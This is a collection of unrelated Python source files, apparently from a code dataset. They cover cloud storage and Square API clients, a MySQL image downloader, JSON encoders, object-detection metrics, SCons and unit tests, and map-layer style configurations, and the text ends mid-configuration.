the-stack_106_16803
|
import os
import logging
import azure.storage.blob
import azure.core.exceptions
from ubiops_connector import OutputConnector, ConnectorError, RecoverableConnectorError, get_variable, retry
logger = logging.getLogger('Azure Blob Storage Connector')
class Deployment(OutputConnector):
def __init__(self, base_directory, context):
"""
:param str base_directory: absolute path to the directory where the deployment file is located
:param dict context: a dictionary containing details of the deployment that might be useful in your code
"""
OutputConnector.__init__(self, base_directory, context)
# Setup the Azure blob client
self.blob_service_client = self.setup()
def setup(self):
"""
Setup the Azure Blob Storage client
:return: azure.storage.blob.BlobServiceClient client: a blob service client
"""
try:
return azure.storage.blob.BlobServiceClient.from_connection_string(
conn_str=get_variable('CONNECTION_STRING', '')
)
except azure.core.exceptions.AzureError as e:
raise ConnectorError(f"Failed to initialise Azure Storage client: {e}")
@retry(attempts=3)
def insert(self, data):
"""
Insert given data to Azure Blob Storage
:param dict data: a dictionary containing the data to be inserted
"""
# The field 'blob' must be present in the data. It contains the blob file path to be uploaded.
if 'blob' not in data:
raise ConnectorError("Field 'blob' is not given in the input")
file_path = data['blob']
filename = os.path.basename(file_path)
path_prefix = get_variable('PATH_PREFIX', '')
# Generate the object path by concatenating (optional) path prefix and filename
object_path = os.path.join(path_prefix, filename)
try:
blob_client = self.blob_service_client.get_blob_client(
container=get_variable('CONTAINER'), blob=object_path
)
            with open(file_path, "rb") as file_obj:
                blob_client.upload_blob(data=file_obj, timeout=int(get_variable('TIMEOUT', '10')))
except azure.core.exceptions.AzureError as e:
raise RecoverableConnectorError(f"Failed to insert blob: {e}")
logger.info("Blob inserted successfully")
|
the-stack_106_16805
|
"""Class module to interface with Square.
"""
import os
from aracnid_logger import Logger
from dateutil import tz, utils
from dateutil.parser import parse
from square.client import Client
# initialize logging
logger = Logger(__name__).get_logger()
class SquareInterface:
"""Interface to Square.
Environment Variables:
SQUARE_ACCESS_TOKEN: OAuth 2.0 Access Token for Square API
SQUARE_ENV: Square API Environment
Attributes:
api_orders: Square client to the Orders API.
api_payments: Square client to the Payments API.
api_refunds: Square client to the Refunds API.
square_client: The Square Client.
"""
def __init__(self):
"""Initializes the Square interface.
Args:
square_client: The Square Client.
"""
square_access_token = os.environ.get('SQUARE_ACCESS_TOKEN')
square_environment = os.environ.get('SQUARE_ENV')
self.square_client = Client(
access_token=square_access_token,
environment=square_environment
)
self.api_orders = self.square_client.orders
self.api_payments = self.square_client.payments
self.api_refunds = self.square_client.refunds
self.api_catalog = self.square_client.catalog
self.api_locations = self.square_client.locations
def decode_order(self, order):
"""Decodes a Square Order into a python dictionary.
Square represents timestamps as RFC 3339 strings. This method decodes
these strings into localized datetime objects.
Args:
order: The Square Order object.
"""
if 'created_at' in order:
order['created_at'] = self.decode_datetime(
order['created_at'])
if 'updated_at' in order:
order['updated_at'] = self.decode_datetime(
order['updated_at'])
if 'closed_at' in order:
order['closed_at'] = self.decode_datetime(
order['closed_at'])
if 'fulfillments' in order:
for fulfillment in order['fulfillments']:
self.decode_fulfillment(fulfillment)
if 'tenders' in order:
for tender in order['tenders']:
self.decode_tender(tender)
if 'refunds' in order:
for refund in order['refunds']:
self.decode_refund(refund)
def decode_fulfillment(self, fulfillment):
"""Decodes a Square OrderFulfillment into a python dictionary.
Square represents timestamps as RFC 3339 strings. This method decodes
these strings into localized datetime objects.
Args:
fulfillment: The Square OrderFulfillment object.
"""
if 'pickup_details' in fulfillment:
pickup_details = fulfillment['pickup_details']
self.decode_fulfillment_pickup(pickup_details)
if 'shipment_details' in fulfillment:
shipment_details = fulfillment['shipment_details']
self.decode_fulfillment_shipment(shipment_details)
def decode_fulfillment_pickup(self, pickup_details):
"""Decodes a Square OrderFulfillment pickup details.
Square represents timestamps as RFC 3339 strings. This method decodes
these strings into localized datetime objects.
Args:
pickup_details: The Square OrderFulfillment pickup details.
"""
if 'accepted_at' in pickup_details:
pickup_details['accepted_at'] = self.decode_datetime(
pickup_details['accepted_at'])
if 'canceled_at' in pickup_details:
pickup_details['canceled_at'] = self.decode_datetime(
pickup_details['canceled_at'])
        if 'curbside_pickup_details' in pickup_details:
            curbside_pickup_details = pickup_details['curbside_pickup_details']
            if 'buyer_arrived_at' in curbside_pickup_details:
                curbside_pickup_details['buyer_arrived_at'] = self.decode_datetime(
                    curbside_pickup_details['buyer_arrived_at'])
if 'expired_at' in pickup_details:
pickup_details['expired_at'] = self.decode_datetime(
pickup_details['expired_at'])
if 'picked_up_at' in pickup_details:
pickup_details['picked_up_at'] = self.decode_datetime(
pickup_details['picked_up_at'])
if 'pickup_at' in pickup_details:
pickup_details['pickup_at'] = self.decode_datetime(
pickup_details['pickup_at'])
if 'placed_at' in pickup_details:
pickup_details['placed_at'] = self.decode_datetime(
pickup_details['placed_at'])
if 'ready_at' in pickup_details:
pickup_details['ready_at'] = self.decode_datetime(
pickup_details['ready_at'])
if 'rejected_at' in pickup_details:
pickup_details['rejected_at'] = self.decode_datetime(
pickup_details['rejected_at'])
def decode_fulfillment_shipment(self, shipment_details):
"""Decodes a Square OrderFulfillment shipment details.
Square represents timestamps as RFC 3339 strings. This method decodes
these strings into localized datetime objects.
Args:
shipment_details: The Square OrderFulfillment shipment details.
"""
if 'canceled_at' in shipment_details:
shipment_details['canceled_at'] = self.decode_datetime(
shipment_details['canceled_at'])
if 'expected_shipped_at' in shipment_details:
shipment_details['expected_shipped_at'] = self.decode_datetime(
shipment_details['expected_shipped_at'])
if 'failed_at' in shipment_details:
shipment_details['failed_at'] = self.decode_datetime(
shipment_details['failed_at'])
if 'in_progress_at' in shipment_details:
shipment_details['in_progress_at'] = self.decode_datetime(
shipment_details['in_progress_at'])
if 'packaged_at' in shipment_details:
shipment_details['packaged_at'] = self.decode_datetime(
shipment_details['packaged_at'])
if 'placed_at' in shipment_details:
shipment_details['placed_at'] = self.decode_datetime(
shipment_details['placed_at'])
if 'shipped_at' in shipment_details:
shipment_details['shipped_at'] = self.decode_datetime(
shipment_details['shipped_at'])
def decode_tender(self, tender):
"""Decodes a Square Tender into a python dictionary.
Square represents timestamps as RFC 3339 strings. This method decodes
these strings into localized datetime objects.
Args:
tender: The Square Tender object.
"""
if 'created_at' in tender:
tender['created_at'] = self.decode_datetime(
tender['created_at'])
def decode_payment(self, payment):
"""Decodes a Square Payment into a python dictionary.
Square represents timestamps as RFC 3339 strings. This method decodes
these strings into localized datetime objects.
Args:
payment: The Square Payment object.
"""
if 'created_at' in payment:
payment['created_at'] = self.decode_datetime(
payment['created_at'])
if 'updated_at' in payment:
payment['updated_at'] = self.decode_datetime(
payment['updated_at'])
if 'processing_fee' in payment:
for fee in payment['processing_fee']:
if 'effective_at' in fee:
fee['effective_at'] = self.decode_datetime(
fee['effective_at'])
if 'delayed_until' in payment:
payment['delayed_until'] = self.decode_datetime(
payment['delayed_until'])
def decode_refund(self, refund):
"""Decodes a Square PaymentRefund into a python dictionary.
Square represents timestamps as RFC 3339 strings. This method decodes
these strings into localized datetime objects.
Args:
refund: The Square PaymentRefund object.
"""
if 'created_at' in refund:
refund['created_at'] = self.decode_datetime(
refund['created_at'])
if 'updated_at' in refund:
refund['updated_at'] = self.decode_datetime(
refund['updated_at'])
if 'processing_fee' in refund:
for fee in refund['processing_fee']:
if 'effective_at' in fee:
fee['effective_at'] = self.decode_datetime(
fee['effective_at'])
def decode_catalog_obj(self, obj, collection):
"""Decodes a Square Catalog object into a python dictionary.
Square represents timestamps as RFC 3339 strings. This method decodes
these strings into localized datetime objects.
Args:
obj: The Square Catalog object.
collection: one of the following catalog names
'square_categories', 'square_items', 'square_variations',
'square_modifiers'
"""
if 'updated_at' in obj:
obj['updated_at'] = self.decode_datetime(
obj['updated_at'])
        if collection == 'square_items':
            variations = obj.get('item_data', {}).get('variations', [])
            for variation in variations:
                if 'updated_at' in variation:
                    variation['updated_at'] = self.decode_datetime(
                        variation['updated_at'])
def decode_location(self, location):
"""Decodes a Square Location into a python dictionary.
Square represents timestamps as RFC 3339 strings. This method decodes
these strings into localized datetime objects.
Args:
location: The Square Location object.
"""
if 'created_at' in location:
location['created_at'] = self.decode_datetime(
location['created_at'])
@staticmethod
def decode_datetime(dt_str):
"""Decodes a Square datetime string into a datetime object
The datetime.fromisoformat() class method does not handle "Z" timezone
notation, so the default_tzinfo() method is used instead.
Args:
dt_str: Datetime string to decode.
"""
return utils.default_tzinfo(parse(dt_str), tz.tzlocal())
def search(self, obj_type, search_filter):
"""Retrieves a list of filtered Square objects.
Args:
obj_type: Type of Square object to search, e.g., 'orders', 'items', etc.
search_filter: Search filter
Returns:
List of Square objects that meet the filter criteria.
"""
obj_list = []
# get the api for the object
api_type = None
if obj_type == 'orders':
api_type = self.api_orders
elif obj_type == 'objects':
api_type = self.api_catalog
if not api_type:
return obj_list
loop_count = 0
result = self.search_fn(obj_type, search_filter)
if result.is_success():
loop_count += 1
            obj_list = result.body.get(obj_type, [])
# process remaining pages
cursor = result.body['cursor'] if 'cursor' in result.body else None
while cursor:
search_filter['cursor'] = cursor
result = self.search_fn(obj_type, search_filter)
if result.is_success():
loop_count += 1
obj_list.extend(result.body[obj_type])
cursor = result.body['cursor'] if 'cursor' in result.body else None
                elif result.is_error():
                    logger.error(f'Error calling Square Api ({obj_type}): loop {loop_count}')
                    logger.error(result.errors)
                    cursor = None  # stop paging on error; otherwise the same failing call repeats forever
elif result.is_error():
logger.error(f'Error calling Square Api ({obj_type}): loop {loop_count}')
logger.error(result.errors)
return obj_list
def search_fn(self, obj_type, search_filter):
"""Executes the search function for the specified "obj_type".
Args:
obj_type: Type of Square object to search, e.g., 'orders', 'items', etc.
search_filter: Search filter
Returns:
Result of the search function.
"""
if obj_type == 'orders':
return self.api_orders.search_orders(search_filter)
if obj_type == 'objects':
return self.api_catalog.search_catalog_objects(search_filter)
return None
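# Usage sketch (not part of the original module): assumes SQUARE_ACCESS_TOKEN and
# SQUARE_ENV are set and that the location ID below is replaced with a real one.
# The filter mirrors the Square SearchOrders request body.
if __name__ == "__main__":
    square = SquareInterface()
    order_filter = {"location_ids": ["REPLACE_WITH_LOCATION_ID"], "limit": 5}
    for order in square.search("orders", order_filter):
        square.decode_order(order)
        print(order.get("id"), order.get("created_at"))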
|
the-stack_106_16807
|
from unitsofmeasure import decprefix
def test():
items = decprefix.prefixes.items()
assert len(items) == 20 # there are 20 decimal prefixes
for (key, prefix) in items:
print(key, prefix)
assert key == prefix.symbol
assert prefix.base == 10
assert prefix.exponent >= -24
assert prefix.exponent <= 24
assert len(prefix.symbol) > 0
assert len(prefix.name) > 0
def test_order():
prefixes = [
decprefix.y,
decprefix.z,
decprefix.a,
decprefix.f,
decprefix.p,
decprefix.n,
decprefix.µ,
decprefix.m,
decprefix.c,
decprefix.d,
decprefix.da,
decprefix.h,
decprefix.k,
decprefix.M,
decprefix.G,
decprefix.T,
decprefix.P,
decprefix.E,
decprefix.Z,
decprefix.Y
]
prev = None
for prefix in prefixes:
if prev is not None:
print(prev, "<", prefix)
assert prev < prefix
assert prefix > prev
prev = prefix
|
the-stack_106_16810
|
import os
import pymysql
import requests as r
from multiprocessing.dummy import Pool as ThreadPool
connection = pymysql.connect(host='localhost',
user='root',
password='root',
db='kinglee-info',
charset='utf8mb4')
def do(fetch_single_result):
article_index, pictures = fetch_single_result
# print(f"Article {article_index}, {len(pictures[0].split('|'))} files contained.")
for pic_index, picture in enumerate(pictures[0].split("|")):
try:
if len(picture) > 0 and "http" in picture:
# print(f"Downloading {picture}")
                binary = r.get(picture)
                file_name = f"article{article_index}_pic{pic_index}.{picture.split('.')[-1].lower()}"
                with open(os.path.join("nosync_news_picture_mttry", file_name), "wb") as file:
                    file.write(binary.content)
else:
print(f"DLERROR: {picture} is not a valid url.")
        except Exception as error:
            print(f"SYSERROR: While downloading {picture}, an error occurred: {error}")
# Make sure the output directory exists before the download threads start writing into it.
os.makedirs("nosync_news_picture_mttry", exist_ok=True)
try:
with connection.cursor() as cursor:
# Read a single record
sql = "SELECT `images` FROM `articles`"
cursor.execute(sql)
fetch_results = cursor.fetchall()
print(f"fetched data. len: {len(fetch_results)}")
with ThreadPool(24) as p:
p.map(do, enumerate(fetch_results))
finally:
connection.close()
|
the-stack_106_16815
|
#
# encoders for various output formats
#
# the dumps() method will be called
#
import io
import csv
import dicttoxml
from datetime import datetime
import uuid
import pow_vue
def pow_json_serializer(obj):
"""JSON serializer for objects not serializable by default json code"""
if isinstance(obj, datetime):
#serial = obj.isoformat()
serial = obj.strftime(pow_vue.config.myapp["date_format"])
return serial
if isinstance(obj, uuid.UUID):
return str(obj)
# add your own additions below here.
raise TypeError ("Type not serializable")
class JsonToCsv():
""" flattens json and converts the flattened
data to csv
"""
def flattenjson(self, mp, delim="_"):
""" flattens a json.
separated nested keys are chained using delim
{
"a" : {
"b" : "1",
"c" : "2"
}
}
rsults in =>
{
"a_b" : "1",
"a_c" : "2",
}
"""
        ret = []
        if isinstance(mp, dict):
            for k in mp.keys():
                flattened = self.flattenjson(mp[k], delim)
                for item in flattened:
                    ret.append(k + delim + str(item))
        elif isinstance(mp, list):
            for k in mp:
                flattened = self.flattenjson(k, delim)
                for item in flattened:
                    ret.append(str(item))
        else:
            ret.append(mp)
        return ret
def dumps(self, data):
""" dumps data to csv.
data will be flattened before
"""
flat_json = self.flattenjson(data)
output = io.StringIO()
writer = csv.writer(output, quoting=csv.QUOTE_NONNUMERIC)
writer.writerow(flat_json)
return output.getvalue()
class JsonToXml():
def dumps(self, data, root="pow_model"):
"""
returns the xml representation of a dict input data
root / custom_root is the root node name of the xml document.
data is a dict.
usage: encoder.dumps(model.to_dict, root="some custom root name")
"""
#print(data)
#print(dicttoxml.dicttoxml(data))
return dicttoxml.dicttoxml(data, custom_root=root)
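# Usage sketch (not part of the original module): exercises both encoders on a
# small nested dict. Running it assumes the pow_vue package imported above is
# available, since it is needed at import time for the JSON date format.
if __name__ == "__main__":
    sample = {"a": {"b": "1", "c": "2"}, "tags": ["x", "y"]}
    print(JsonToCsv().dumps(sample))                 # one CSV row of flattened values
    print(JsonToXml().dumps(sample, root="sample"))  # bytes containing an XML document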
|
the-stack_106_16816
|
# Model validation metrics
import matplotlib.pyplot as plt
import numpy as np
def fitness(x):
    # Model fitness as a weighted combination of metrics
    w = [0.0, 0.0, 0.1, 0.9]  # weights for [P, R, mAP@0.5, mAP@0.5:0.95]
    return (x[:, :4] * w).sum(1)
def fitness_p(x):
    # Model fitness as a weighted combination of metrics
    w = [1.0, 0.0, 0.0, 0.0]  # weights for [P, R, mAP@0.5, mAP@0.5:0.95]
    return (x[:, :4] * w).sum(1)
def fitness_r(x):
    # Model fitness as a weighted combination of metrics
    w = [0.0, 1.0, 0.0, 0.0]  # weights for [P, R, mAP@0.5, mAP@0.5:0.95]
    return (x[:, :4] * w).sum(1)
def fitness_ap50(x):
    # Model fitness as a weighted combination of metrics
    w = [0.0, 0.0, 1.0, 0.0]  # weights for [P, R, mAP@0.5, mAP@0.5:0.95]
    return (x[:, :4] * w).sum(1)
def fitness_ap(x):
    # Model fitness as a weighted combination of metrics
    w = [0.0, 0.0, 0.0, 1.0]  # weights for [P, R, mAP@0.5, mAP@0.5:0.95]
    return (x[:, :4] * w).sum(1)
def fitness_f(x):
    # Model fitness proportional to the F1 score: P*R / (P + R)
    #w = [0.0, 0.0, 0.0, 1.0]  # weights for [P, R, mAP@0.5, mAP@0.5:0.95]
    return ((x[:, 0] * x[:, 1]) / (x[:, 0] + x[:, 1]))
def ap_per_class(tp, conf, pred_cls, target_cls, plot=False, fname='precision-recall_curve.png'):
""" Compute the average precision, given the recall and precision curves.
Source: https://github.com/rafaelpadilla/Object-Detection-Metrics.
# Arguments
tp: True positives (nparray, nx1 or nx10).
conf: Objectness value from 0-1 (nparray).
pred_cls: Predicted object classes (nparray).
target_cls: True object classes (nparray).
        plot: Plot precision-recall curve at mAP@0.5
fname: Plot filename
# Returns
The average precision as computed in py-faster-rcnn.
"""
# Sort by objectness
i = np.argsort(-conf)
tp, conf, pred_cls = tp[i], conf[i], pred_cls[i]
# Find unique classes
unique_classes = np.unique(target_cls)
# Create Precision-Recall curve and compute AP for each class
px, py = np.linspace(0, 1, 1000), [] # for plotting
pr_score = 0.1 # score to evaluate P and R https://github.com/ultralytics/yolov3/issues/898
s = [unique_classes.shape[0], tp.shape[1]] # number class, number iou thresholds (i.e. 10 for mAP0.5...0.95)
ap, p, r = np.zeros(s), np.zeros(s), np.zeros(s)
for ci, c in enumerate(unique_classes):
i = pred_cls == c
n_l = (target_cls == c).sum() # number of labels
n_p = i.sum() # number of predictions
if n_p == 0 or n_l == 0:
continue
else:
# Accumulate FPs and TPs
fpc = (1 - tp[i]).cumsum(0)
tpc = tp[i].cumsum(0)
# Recall
recall = tpc / (n_l + 1e-16) # recall curve
r[ci] = np.interp(-pr_score, -conf[i], recall[:, 0]) # r at pr_score, negative x, xp because xp decreases
# Precision
precision = tpc / (tpc + fpc) # precision curve
p[ci] = np.interp(-pr_score, -conf[i], precision[:, 0]) # p at pr_score
# AP from recall-precision curve
for j in range(tp.shape[1]):
ap[ci, j], mpre, mrec = compute_ap(recall[:, j], precision[:, j])
if j == 0:
                    py.append(np.interp(px, mrec, mpre))  # precision at mAP@0.5
# Compute F1 score (harmonic mean of precision and recall)
f1 = 2 * p * r / (p + r + 1e-16)
if plot:
py = np.stack(py, axis=1)
fig, ax = plt.subplots(1, 1, figsize=(5, 5))
ax.plot(px, py, linewidth=0.5, color='grey') # plot(recall, precision)
        ax.plot(px, py.mean(1), linewidth=2, color='blue', label='all classes %.3f mAP@0.5' % ap[:, 0].mean())
ax.set_xlabel('Recall')
ax.set_ylabel('Precision')
ax.set_xlim(0, 1)
ax.set_ylim(0, 1)
plt.legend()
fig.tight_layout()
fig.savefig(fname, dpi=200)
return p, r, ap, f1, unique_classes.astype('int32')
def compute_ap(recall, precision):
""" Compute the average precision, given the recall and precision curves.
Source: https://github.com/rbgirshick/py-faster-rcnn.
# Arguments
recall: The recall curve (list).
precision: The precision curve (list).
# Returns
The average precision as computed in py-faster-rcnn.
"""
# Append sentinel values to beginning and end
mrec = recall # np.concatenate(([0.], recall, [recall[-1] + 1E-3]))
mpre = precision # np.concatenate(([0.], precision, [0.]))
# Compute the precision envelope
mpre = np.flip(np.maximum.accumulate(np.flip(mpre)))
# Integrate area under curve
method = 'interp' # methods: 'continuous', 'interp'
if method == 'interp':
x = np.linspace(0, 1, 101) # 101-point interp (COCO)
ap = np.trapz(np.interp(x, mrec, mpre), x) # integrate
else: # 'continuous'
i = np.where(mrec[1:] != mrec[:-1])[0] # points where x axis (recall) changes
ap = np.sum((mrec[i + 1] - mrec[i]) * mpre[i + 1]) # area under curve
return ap, mpre, mrec
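# Usage sketch (not part of the original module): synthetic single-class
# detections at one IoU threshold, purely to illustrate the expected shapes of
# the inputs to ap_per_class; the numbers are arbitrary.
if __name__ == "__main__":
    tp = np.array([[1], [1], [0], [1]])    # n x 1 true-positive flags per detection
    conf = np.array([0.9, 0.8, 0.7, 0.6])  # objectness scores
    pred_cls = np.zeros(4)                 # all predictions belong to class 0
    target_cls = np.zeros(5)               # five ground-truth boxes of class 0
    p, r, ap, f1, classes = ap_per_class(tp, conf, pred_cls, target_cls)
    print("P", p, "R", r, "AP", ap, "F1", f1)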
|
the-stack_106_16819
|
from model.contact import Contact
testdata = [
Contact(first_name="first", last_name="last", email="em", email2="em2", email3="em3",
day="day", month="mon", year="year", notes="no",
homephone="home", mobilephone="mob", workphone="work", secondaryphone="sec",
address="add", address2="add2"),
Contact(first_name="first_1", last_name="last_1", email="em_1", email2="em2_1", email3="em3_1",
day="day_1", month="mon_1", year="year_1", notes="no_1",
homephone="home_1", mobilephone="mob_1", workphone="work_1", secondaryphone="sec_1",
address="add_1", address2="add2_1"),
]
|
the-stack_106_16821
|
#!/usr/bin/env python
#
# Copyright (c) 2001 - 2016 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "test/TEX/clean.py rel_2.5.1:3735:9dc6cee5c168 2016/11/03 14:02:02 bdbaddog"
"""
Check that all auxiliary files created by LaTeX are properly cleaned by scons -c.
"""
import os
import TestSCons
test = TestSCons.TestSCons()
latex = test.where_is('latex')
if not latex:
test.skip_test("Could not find tex or latex; skipping test(s).\n")
comment = os.system('kpsewhich comment.sty')
if not comment==0:
test.skip_test("comment.sty not installed; skipping test(s).\n")
# package hyperref generates foo.out
# package comment generates comment.cut
# todo: add makeindex etc.
input_file = r"""
\documentclass{article}
\usepackage{hyperref}
\usepackage{comment}
\specialcomment{foocom}{}{}
\begin{document}
\begin{foocom}
Hi
\end{foocom}
As stated in \cite{X}, this is a bug-a-boo.
\bibliography{fooref}
\bibliographystyle{plain}
\end{document}
"""
bibfile = r"""
@Article{X,
author = "Mr. X",
title = "A determination of bug-a-boo-ness",
journal = "Journal of B.a.B.",
year = 1920,
volume = 62,
pages = 291
}
"""
test.write('SConstruct', """\
import os
env = Environment(tools = ['tex', 'latex'])
env.DVI( "foo.ltx" )
""")
test.write('foo.ltx', input_file)
test.write('fooref.bib', bibfile)
test.run()
test.must_exist('foo.log')
test.must_exist('foo.aux')
test.must_exist('foo.bbl')
test.must_exist('foo.blg')
test.must_exist('comment.cut')
test.must_exist('foo.out')
test.run(arguments = '-c')
test.must_not_exist('foo.log')
test.must_not_exist('foo.aux')
test.must_not_exist('foo.bbl')
test.must_not_exist('foo.blg')
test.must_not_exist('comment.cut')
test.must_not_exist('foo.out')
test.pass_test()
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
|
the-stack_106_16823
|
from ows_refactored.ows_legend_cfg import legend_idx_0_1_5ticks
style_ls_simple_rgb = {
"name": "simple_rgb",
"title": "Simple RGB",
"abstract": "Simple true-colour image, using the red, green and blue bands",
"components": {"red": {"red": 1.0}, "green": {"green": 1.0}, "blue": {"blue": 1.0}},
"scale_range": [0.0, 3000.0],
}
style_ls_irg = {
"name": "infrared_green",
"title": "False colour - Green, SWIR, NIR",
"abstract": "False Colour image with SWIR1->Red, NIR->Green, and Green->Blue",
"components": {
"red": {"swir1": 1.0},
"green": {"nir": 1.0},
"blue": {"green": 1.0},
},
"scale_range": [0.0, 3000.0],
}
style_ls_ndvi = {
"name": "ndvi",
"title": "NDVI - Red, NIR",
"abstract": "Normalised Difference Vegetation Index - a derived index that correlates well with the existence of vegetation",
"index_function": {
"function": "datacube_ows.band_utils.norm_diff",
"mapped_bands": True,
"kwargs": {"band1": "nir", "band2": "red"},
},
"needed_bands": ["red", "nir"],
"color_ramp": [
{"value": -0.0, "color": "#8F3F20", "alpha": 0.0},
{"value": 0.0, "color": "#8F3F20", "alpha": 1.0},
{"value": 0.1, "color": "#A35F18"},
{"value": 0.2, "color": "#B88512"},
{"value": 0.3, "color": "#CEAC0E"},
{"value": 0.4, "color": "#E5D609"},
{"value": 0.5, "color": "#FFFF0C"},
{"value": 0.6, "color": "#C3DE09"},
{"value": 0.7, "color": "#88B808"},
{"value": 0.8, "color": "#529400"},
{"value": 0.9, "color": "#237100"},
{"value": 1.0, "color": "#114D04"},
],
"legend": legend_idx_0_1_5ticks,
}
style_ls_ndwi = {
"name": "ndwi",
"title": "NDWI - Green, NIR",
"abstract": "Normalised Difference Water Index - a derived index that correlates well with the existence of water (McFeeters 1996)",
"index_function": {
"function": "datacube_ows.band_utils.norm_diff",
"mapped_bands": True,
"kwargs": {"band1": "green", "band2": "nir"},
},
"needed_bands": ["green", "nir"],
"color_ramp": [
{"value": -0.1, "color": "#f7fbff", "alpha": 0.0},
{
"value": 0.0,
"color": "#d8e7f5",
},
{"value": 0.1, "color": "#b0d2e8"},
{
"value": 0.2,
"color": "#73b3d8",
},
{"value": 0.3, "color": "#3e8ec4"},
{
"value": 0.4,
"color": "#1563aa",
},
{
"value": 0.5,
"color": "#08306b",
},
],
"legend": {
"begin": "0.0",
"end": "0.5",
"decimal_places": 1,
"ticks": ["0.0", "0.2", "0.4", "0.5"],
"tick_labels": {
"0.0": {"prefix": "<"},
"0.2": {"label": "0.2"},
"0.4": {"label": "0.4"},
"0.5": {"prefix": ">"},
},
},
}
style_ls_mndwi = {
"name": "mndwi",
"title": "MNDWI - Green, SWIR",
"abstract": "Modified Normalised Difference Water Index - a derived index that correlates well with the existence of water (Xu 2006)",
"index_function": {
"function": "datacube_ows.band_utils.norm_diff",
"mapped_bands": True,
"kwargs": {"band1": "green", "band2": "swir1"},
},
"needed_bands": ["green", "swir1"],
"color_ramp": [
{"value": -0.1, "color": "#f7fbff", "alpha": 0.0},
{"value": 0.0, "color": "#d8e7f5"},
{"value": 0.2, "color": "#b0d2e8"},
{"value": 0.4, "color": "#73b3d8"},
{"value": 0.6, "color": "#3e8ec4"},
{"value": 0.8, "color": "#1563aa"},
{"value": 1.0, "color": "#08306b"},
],
"legend": legend_idx_0_1_5ticks,
}
style_ls_pure_blue = {
"name": "blue",
"title": "Blue - 480",
"abstract": "Blue band, centered on 480nm",
"components": {"red": {"blue": 1.0}, "green": {"blue": 1.0}, "blue": {"blue": 1.0}},
"scale_range": [0.0, 3000.0],
}
style_ls_pure_green = {
"name": "green",
"title": "Green - 560",
"abstract": "Green band, centered on 560nm",
"components": {
"red": {"green": 1.0},
"green": {"green": 1.0},
"blue": {"green": 1.0},
},
"scale_range": [0.0, 3000.0],
}
style_ls_pure_red = {
"name": "red",
"title": "Red - 660",
"abstract": "Red band, centered on 660nm",
"components": {"red": {"red": 1.0}, "green": {"red": 1.0}, "blue": {"red": 1.0}},
"scale_range": [0.0, 3000.0],
}
style_ls_pure_nir = {
"name": "nir",
"title": "Near Infrared (NIR) - 840",
"abstract": "Near infra-red band, centered on 840nm",
"components": {"red": {"nir": 1.0}, "green": {"nir": 1.0}, "blue": {"nir": 1.0}},
"scale_range": [0.0, 3000.0],
}
style_ls_pure_swir1 = {
"name": "swir1",
"title": "Shortwave Infrared (SWIR) - 1650",
"abstract": "Short wave infra-red band 1, centered on 1650nm",
"components": {
"red": {"swir1": 1.0},
"green": {"swir1": 1.0},
"blue": {"swir1": 1.0},
},
"scale_range": [0.0, 3000.0],
}
style_ls_pure_swir2 = {
"name": "swir2",
"title": "Shortwave Infrared (SWIR) - 2220",
"abstract": "Short wave infra-red band 2, centered on 2220nm",
"components": {
"red": {"swir2": 1.0},
"green": {"swir2": 1.0},
"blue": {"swir2": 1.0},
},
"scale_range": [0.0, 3000.0],
}
# styles tmad
sdev_scaling = [0.020, 0.18]
edev_scaling = [6.2, 7.3]
bcdev_scaling = [0.025, 0.13]
style_tmad_sdev_std = {
"name": "arcsec_sdev",
"title": "Spectral MAD (SMAD)",
"abstract": "Good for cropland and forest",
"index_function": {
"function": "datacube_ows.band_utils.single_band_arcsec",
"mapped_bands": True,
"kwargs": {"band": "sdev", "scale_from": sdev_scaling, "scale_to": [0.0, 4.0]},
},
"needed_bands": ["sdev"],
"mpl_ramp": "coolwarm",
"range": [0.0, 4.0],
"legend": {
"start": "0.0",
"end": "4.0",
"ticks": ["0.0", "4.0"],
"tick_labels": {
"0.0": {"label": "Low\nSMAD"},
"4.0": {"label": "High\nSMAD"},
},
},
}
style_tmad_edev_std = {
"name": "log_edev",
"title": "Euclidean MAD (EMAD)",
"abstract": "Good for cropland and forest",
"index_function": {
"function": "datacube_ows.band_utils.single_band_offset_log",
"mapped_bands": True,
"kwargs": {"band": "edev", "scale_from": edev_scaling, "scale_to": [0.0, 4.0]},
},
"needed_bands": ["edev"],
"mpl_ramp": "coolwarm",
"range": [0.0, 4.0],
"legend": {
"start": "0.0",
"end": "4.0",
"ticks": ["0.0", "4.0"],
"tick_labels": {
"0.0": {"label": "Low\nEMAD"},
"4.0": {"label": "High\nEMAD"},
},
},
}
style_tmad_bcdev_std = {
"name": "log_bcdev",
"title": "Bray-Curtis MAD (BCMAD)",
"abstract": "Good for cropland and forest",
"index_function": {
"function": "datacube_ows.band_utils.single_band_offset_log",
"mapped_bands": True,
"kwargs": {
"band": "bcdev",
"scale_from": bcdev_scaling,
"scale_to": [0.0, 4.0],
},
},
"needed_bands": ["bcdev"],
"mpl_ramp": "coolwarm",
"range": [0.0, 4.0],
"legend": {
"start": "0.0",
"end": "4.0",
"ticks": ["0.0", "4.0"],
"tick_labels": {
"0.0": {"label": "Low\nBCMAD"},
"4.0": {"label": "High\nBCMAD"},
},
},
}
style_tmad_rgb_std = {
"name": "tmad_rgb_std",
"title": "MADs - SMAD, EMAD, BCMAD",
"abstract": "Good for cropland and forest",
"components": {
"red": {
"function": "datacube_ows.band_utils.single_band_arcsec",
"mapped_bands": True,
"kwargs": {
"band": "sdev",
"scale_from": sdev_scaling,
},
},
"green": {
"function": "datacube_ows.band_utils.single_band_offset_log",
"mapped_bands": True,
"kwargs": {
"band": "edev",
"scale_from": edev_scaling,
},
},
